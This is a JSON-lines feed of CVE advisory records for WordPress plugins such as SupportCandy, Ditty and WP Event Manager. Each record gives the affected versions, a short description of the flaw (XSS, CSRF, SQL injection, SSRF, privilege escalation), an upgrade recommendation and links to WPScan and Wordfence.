{"CVE_ID":"CVE-2024-4655","slug":"ultimate-blocks","versionImpact":"3.1.7","versionEndExcluding":"3.1.9","description":"The Ultimate Blocks  WordPress plugin before 3.1.9 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 3.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0dc73b3-3c51-4d03-963f-00fa7d8b0d51\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0dc73b3-3c51-4d03-963f-00fa7d8b0d51\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8477","slug":"mailin","versionImpact":"3.1.87","versionEndExcluding":"3.1.88","description":"The Newsletter, SMTP, Email marketing and Subscribe forms by Brevo (formely Sendinblue) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.87. This is due to missing or incorrect nonce validation on the Init() function. This makes it possible for unauthenticated attackers to log out of a Brevo connection via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.1.88, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e070b422-9036-4362-832b-43fd4838f394?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e070b422-9036-4362-832b-43fd4838f394?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165451\\\/mailin\\\/tags\\\/3.1.88\\\/page\\\/page-home.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165451\\\/mailin\\\/tags\\\/3.1.88\\\/page\\\/page-home.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3964","slug":"product-enquiry-for-woocommerce","versionImpact":"3.1.7","versionEndExcluding":"3.1.8","description":"The Product Enquiry for WooCommerce WordPress plugin before 3.1.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff468772-3e6a-439c-a4d7-94bd2ce1a964\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ff468772-3e6a-439c-a4d7-94bd2ce1a964\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13375","slug":"adifier-system","versionImpact":"3.1.7","versionEndExcluding":"3.1.8","description":"The Adifier System plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.1.7. This is due to the plugin not properly validating a user's identity prior to updating their details like password through the adifier_recover() function. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"Update to version 3.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/adifier-classified-ads-wordpress-theme\\\/21633950\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/adifier-classified-ads-wordpress-theme\\\/21633950\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbf2aeed-0f18-4ef6-aff8-9e8c4531d789?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbf2aeed-0f18-4ef6-aff8-9e8c4531d789?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13774","slug":"wish-list-for-woocommerce","versionImpact":"3.1.7","versionEndExcluding":"3.1.8","description":"The Wishlist for WooCommerce: Multi Wishlists Per Customer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.7. This is due to missing or incorrect nonce validation on the 'save_to_multiple_wishlist' function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wish-list-for-woocommerce\\\/tags\\\/3.1.7\\\/includes\\\/free\\\/class-alg-wc-wish-list-ajax.php#L337\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wish-list-for-woocommerce\\\/tags\\\/3.1.7\\\/includes\\\/free\\\/class-alg-wc-wish-list-ajax.php#L337\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wish-list-for-woocommerce\\\/tags\\\/3.1.7\\\/includes\\\/free\\\/class-alg-wc-wish-list-ajax.php#L789\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wish-list-for-woocommerce\\\/tags\\\/3.1.7\\\/includes\\\/free\\\/class-alg-wc-wish-list-ajax.php#L789\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c11456bb-dde3-4ab8-b00b-a6cdcc68a760?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c11456bb-dde3-4ab8-b00b-a6cdcc68a760?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7888","slug":"classified-listing","versionImpact":"3.1.7","versionEndExcluding":"3.1.8","description":"The Classified Listing \u2013 Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several functions like export_forms(), import_forms(), update_fb_options(), and many more in all versions up to, and including, 3.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify forms and various other settings.","recommendation":"Update to version 3.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/494d2e69-0759-419a-a603-e8870c157e49?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/494d2e69-0759-419a-a603-e8870c157e49?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/classified-listing\\\/tags\\\/3.1.6\\\/app\\\/Controllers\\\/Ajax\\\/FormBuilderAdminAjax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/classified-listing\\\/tags\\\/3.1.6\\\/app\\\/Controllers\\\/Ajax\\\/FormBuilderAdminAjax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3150743\\\/classified-listing\\\/trunk\\\/app\\\/Controllers\\\/Ajax\\\/FormBuilderAdminAjax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3150743\\\/classified-listing\\\/trunk\\\/app\\\/Controllers\\\/Ajax\\\/FormBuilderAdminAjax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4787","slug":"cost-calculator-builder-pro","versionImpact":"3.1.75","versionEndExcluding":"3.1.76","description":"The Cost Calculator Builder PRO for WordPress is vulnerable to arbitrary email sending vulnerability in versions up to, and including, 3.1.75. This is due to insufficient limitations on the email recipient and the content in the 'send_pdf' and the 'send_pdf_front' functions which are reachable via AJAX. This makes it possible for unauthenticated attackers to send emails with any content to any recipient.","recommendation":"Update to version 3.1.76, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/035ada56-541d-47b3-8348-3401d94bb509?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/035ada56-541d-47b3-8348-3401d94bb509?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/cost-calculator-builder\\\/changelog-1\\\/changelog-pro-version\",\"name\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/cost-calculator-builder\\\/changelog-1\\\/changelog-pro-version\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4789","slug":"cost-calculator-builder-pro","versionImpact":"3.1.72","versionEndExcluding":"3.1.73","description":"Cost Calculator Builder Pro plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to 3.1.72, via the send_demo_webhook() function. This makes it possible for authenticated attackers, with subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 3.1.73, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6840350-7ff4-4ec2-bf2b-94ce6f782537?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6840350-7ff4-4ec2-bf2b-94ce6f782537?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/stylemixthemes.com\\\/cost-calculator-plugin\\\/\",\"name\":\"https:\\\/\\\/stylemixthemes.com\\\/cost-calculator-plugin\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2113","slug":"autoptimize","versionEndExcluding":"3.1.7","description":"The Autoptimize WordPress plugin before 3.1.7 does not sanitise and escape the settings imported from a previous export, allowing high privileged users (such as an administrator) to inject arbitrary javascript into the admin panel, even when the unfiltered_html capability is disabled, such as in a multisite setup.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ddb4c95d-bbee-4095-aed6-25f6b8e63011\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ddb4c95d-bbee-4095-aed6-25f6b8e63011\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2805","slug":"supportcandy","versionEndExcluding":"3.1.7","description":"The SupportCandy WordPress plugin before 3.1.7 does not properly sanitise and escape the agents[] parameter in the set_add_agent_leaves AJAX function before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bdb75c8c-87e2-4358-ad3b-f4236e9a43c0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bdb75c8c-87e2-4358-ad3b-f4236e9a43c0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2719","slug":"supportcandy","versionEndExcluding":"3.1.7","description":"The SupportCandy WordPress plugin before 3.1.7 does not properly sanitise and escape the `id` parameter for an Agent in the REST API before using it in an SQL statement, leading to an SQL Injection exploitable by users with a role as low as Subscriber.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9f6f4e7-a237-49c0-aba0-2934ab019e35\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9f6f4e7-a237-49c0-aba0-2934ab019e35\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3241","slug":"ultimate-blocks","versionImpact":"3.1.6","versionEndExcluding":"3.1.7","description":"The Ultimate Blocks  WordPress plugin before 3.1.7 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 3.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a645daee-42ea-43f8-9480-ef3be69606e0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a645daee-42ea-43f8-9480-ef3be69606e0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1049","slug":"coblocks","versionImpact":"3.1.6","versionEndExcluding":"3.1.7","description":"The Page Builder Gutenberg Blocks \u2013 CoBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Icon Widget's in all versions up to, and including, 3.1.6 due to insufficient input sanitization and output escaping on the link value. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56d1d152-946f-47c9-b0d5-76513370677f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56d1d152-946f-47c9-b0d5-76513370677f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049222%40vimeography&new=3049222%40vimeography&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049222%40vimeography&new=3049222%40vimeography&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4097","slug":"cost-calculator-builder-pro","versionImpact":"3.1.67","versionEndExcluding":"3.1.68","description":"The Cost Calculator Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the SVG upload feature in all versions up to, and including, 3.1.67 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.68, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/526add70-4fcf-44d1-b4d8-4cc35652b1f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/526add70-4fcf-44d1-b4d8-4cc35652b1f0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/cost-calculator-builder\\\/changelog-1\\\/changelog-pro-version\",\"name\":\"https:\\\/\\\/docs.stylemixthemes.com\\\/cost-calculator-builder\\\/changelog-1\\\/changelog-pro-version\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2472","slug":"mailin","versionEndExcluding":"3.1.61","description":"The Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue WordPress plugin before 3.1.61 does not sanitise and escape a parameter before outputting it back in the admin dashboard when the WPML plugin is also active and configured, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0e7665a-c8c3-4132-b8d7-8677a90118df\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b0e7665a-c8c3-4132-b8d7-8677a90118df\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4060","slug":"adminify","versionEndExcluding":"3.1.6","description":"The WP Adminify WordPress plugin before 3.1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88745c9b-1c20-4004-89f6-d9ee223651f2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88745c9b-1c20-4004-89f6-d9ee223651f2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10667","slug":"content-slider-block","versionImpact":"3.1.5","versionEndExcluding":"3.1.6","description":"The Content Slider Block plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.1.5 via the [csb] shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 3.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c34ca97f-d974-4ad1-b4a5-93613eb43a37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c34ca97f-d974-4ad1-b4a5-93613eb43a37?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180314\\\/content-slider-block\\\/tags\\\/3.1.6\\\/includes\\\/CustomPost.php?old=3178657&old_path=content-slider-block%2Ftags%2F3.1.5%2Fincludes%2FCustomPost.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180314\\\/content-slider-block\\\/tags\\\/3.1.6\\\/includes\\\/CustomPost.php?old=3178657&old_path=content-slider-block%2Ftags%2F3.1.5%2Fincludes%2FCustomPost.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13357","slug":"ditty-news-ticker","versionImpact":"3.1.51","versionEndExcluding":"3.1.52","description":"The Ditty  WordPress plugin before 3.1.52 does not sanitise and escape some of its settings, which could allow high privilege users such as author to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.1.52, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d134bb34-6324-4bc8-943e-4e743d00fcb2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d134bb34-6324-4bc8-943e-4e743d00fcb2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2800","slug":"wp-event-manager","versionImpact":"3.1.50","versionEndExcluding":"3.1.51","description":"The WP Event Manager \u2013 Events Calendar, Registrations, Sell Tickets with WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018organizer_name' parameter in all versions up to, and including, 3.1.50 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.51, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318605\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318605\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87178c7c-343b-487a-9adb-7ff13aae81df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87178c7c-343b-487a-9adb-7ff13aae81df?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2025-2799","slug":"wp-event-manager","versionImpact":"3.1.49","versionEndExcluding":"3.1.50","description":"The WP Event Manager \u2013 Events Calendar, Registrations, Sell Tickets with WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018tag-name\u2019 parameter in all versions up to, and including, 3.1.49 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.1.50, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309197\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3309197\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5cb5ab0-2110-49be-bc09-6847065a9dd9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5cb5ab0-2110-49be-bc09-6847065a9dd9?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2023-1730","slug":"supportcandy","versionEndExcluding":"3.1.5","description":"The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44b51a56-ff05-4d50-9327-fc9bab74d4b7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44b51a56-ff05-4d50-9327-fc9bab74d4b7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13834","slug":"responsive-add-ons","versionImpact":"3.1.4","versionEndExcluding":"3.1.5","description":"The Responsive Plus \u2013 Starter Templates, Advanced Features and Customizer Settings for Responsive Theme plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.1.4 via the 'remote_request' function. This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 3.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3240422\\\/responsive-add-ons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3240422\\\/responsive-add-ons\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2833265-f1e5-4cfd-ad2f-ca28a59de82f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2833265-f1e5-4cfd-ad2f-ca28a59de82f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9600","slug":"ditty-news-ticker","versionImpact":"3.1.46","versionEndExcluding":"3.1.47","description":"The Ditty  WordPress plugin before 3.1.47 does not sanitise and escape some of its settings, which could allow high privilege users such as author to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 3.1.47, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1c78389-29eb-4dce-848c-e0eab85ff5cd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1c78389-29eb-4dce-848c-e0eab85ff5cd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6715","slug":"ditty-news-ticker","versionImpact":"3.1.45","versionEndExcluding":"3.1.46","description":"The Ditty  WordPress plugin before 3.1.46 re-introduced a previously fixed security issue (https:\/\/wpscan.com\/vulnerability\/80a9eb3a-2cb1-4844-9004-ba2554b2d46c\/) in v3.1.39","recommendation":"Update to version 3.1.46, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19406acc-3441-4d4a-9163-ace8f1dceb78\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19406acc-3441-4d4a-9163-ace8f1dceb78\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6710","slug":"ditty-news-ticker","versionImpact":"3.1.44","versionEndExcluding":"3.1.45","description":"The Ditty  WordPress plugin before 3.1.45 does not sanitise and escape some parameters, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks.","recommendation":"Update to version 3.1.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1afcf9d4-c2f9-4d47-8d9e-d7fa6ae2358d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1afcf9d4-c2f9-4d47-8d9e-d7fa6ae2358d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2691","slug":"wp-event-manager","versionImpact":"3.1.43","versionEndExcluding":"3.1.44","description":"The WP Event Manager \u2013 Events Calendar, Registrations, Sell Tickets with WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'events' shortcode in all versions up to, and including, 3.1.43 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01a6dcf2-6f0b-494b-a18c-04bd9c44e0ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01a6dcf2-6f0b-494b-a18c-04bd9c44e0ce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116941\\\/wp-event-manager\\\/trunk\\\/shortcodes\\\/wp-event-manager-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116941\\\/wp-event-manager\\\/trunk\\\/shortcodes\\\/wp-event-manager-shortcodes.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5575","slug":"ditty-news-ticker","versionImpact":"3.1.42","versionEndExcluding":"3.1.43","description":"The Ditty  WordPress plugin before 3.1.43 does not sanitise and escape some of its blocks' settings, which could allow high privilege users such as authors to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 3.1.43, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65d1abb7-92e9-4cc4-a1d0-84985b484af3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/65d1abb7-92e9-4cc4-a1d0-84985b484af3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6165","slug":"restrict-usernames-emails-characters","versionEndExcluding":"3.1.4","description":"The Restrict Usernames Emails Characters WordPress plugin before 3.1.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 3.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aba62286-9a82-4d5b-9b47-1fddde5da487\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aba62286-9a82-4d5b-9b47-1fddde5da487\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/youki992\\\/youki992.github.io\\\/blob\\\/master\\\/others\\\/apply2.md\",\"name\":\"https:\\\/\\\/github.com\\\/youki992\\\/youki992.github.io\\\/blob\\\/master\\\/others\\\/apply2.md\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0668","slug":"advanced-database-cleaner","versionImpact":"3.1.3","versionEndExcluding":"3.1.4","description":"The Advanced Database Cleaner plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.3 via deserialization of untrusted input in the 'process_bulk_action' function. This makes it possible for authenticated attacker, with administrator access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 3.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0b8c24b-3e51-4637-9d8e-da065077d082?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0b8c24b-3e51-4637-9d8e-da065077d082?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-database-cleaner\\\/tags\\\/3.1.3\\\/includes\\\/class_clean_cron.php#L224\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-database-cleaner\\\/tags\\\/3.1.3\\\/includes\\\/class_clean_cron.php#L224\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-database-cleaner\\\/tags\\\/3.1.3\\\/includes\\\/class_clean_cron.php#L298\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-database-cleaner\\\/tags\\\/3.1.3\\\/includes\\\/class_clean_cron.php#L298\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3025980\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3025980\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
